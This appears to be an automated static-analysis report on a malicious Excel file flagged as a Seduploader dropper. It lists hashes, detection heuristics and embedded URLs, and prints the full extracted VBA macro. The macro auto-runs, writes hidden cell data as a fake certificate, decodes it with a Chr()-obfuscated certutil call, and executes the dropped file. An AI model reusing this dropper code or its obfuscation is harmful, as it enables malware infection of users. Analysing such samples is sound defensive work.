Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb85072e6ca66a29…

MALICIOUS

Office (OLE)

233.0 KB Created: 2018-01-31 13:37:40 Authoring application: Microsoft Excel First seen: 2020-12-25
MD5: 56f98e3ed00e48ff9cb89dea5f6e11c1 SHA-1: b06930c9809ab5e4cb6659089ac6fcec470c9c16 SHA-256: cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
390 Risk Score

Heuristics 10

  • ClamAV: Doc.Dropper.Seduploader-6784277-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Seduploader-6784277-0
  • Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.maritime-recon.com/janes In document text (OLE body)
    • http://www.mobiledeployable.com/janesIn document text (OLE body)
    • http://www.globalsofsymposium.org/us#1In document text (OLE body)
    • http://www.maritime-recon.com/janes�In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2577 bytes
SHA-256: 65c3fe528293239f417e1129f19c1fe126b3214a35d389c66ca3477a3738222e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
    ActiveSheet.Range("a1:c54").Font.Color = vbBlack
    Call LinesOfBusiness.TQuH8wDO

    
End Sub


Attribute VB_Name = "LinesOfBusiness"

#If VBA7 Then
    Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Function GetRand()
    Dim r As String
    Dim i As Integer
     
    Randomize
    For i = 1 To 8
        If i Mod 2 = 0 Then
            r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
        Else
            r = Int((9 * Rnd) + 1) & r
        End If
    Next i
    GetRand = r
End Function


Sub cutil(code As String)
    Dim x As String
    
    x = "-----BEG" & "IN CER" & "TIFICATE-----"
    x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + vbNewLine
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    
    Dim path As String
    path = "C:\Programdata\" & rndname & ".txt"
    expath = "C:\Programdata\" & rndname & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    path = "C:\Programdata\" & GetRand & ".txt"
    expath = "C:\Programdata\" & GetRand & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
    Set file = scr.CreateTextFile(path, True)
    file.Write x
    file.Close

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    Sleep 2000
    Shell (expath)
End Sub


Sub TQuH8wDO()
    Dim p As String
    p = GetVal(2227, 2248, 170)
    cutil (p)
End Sub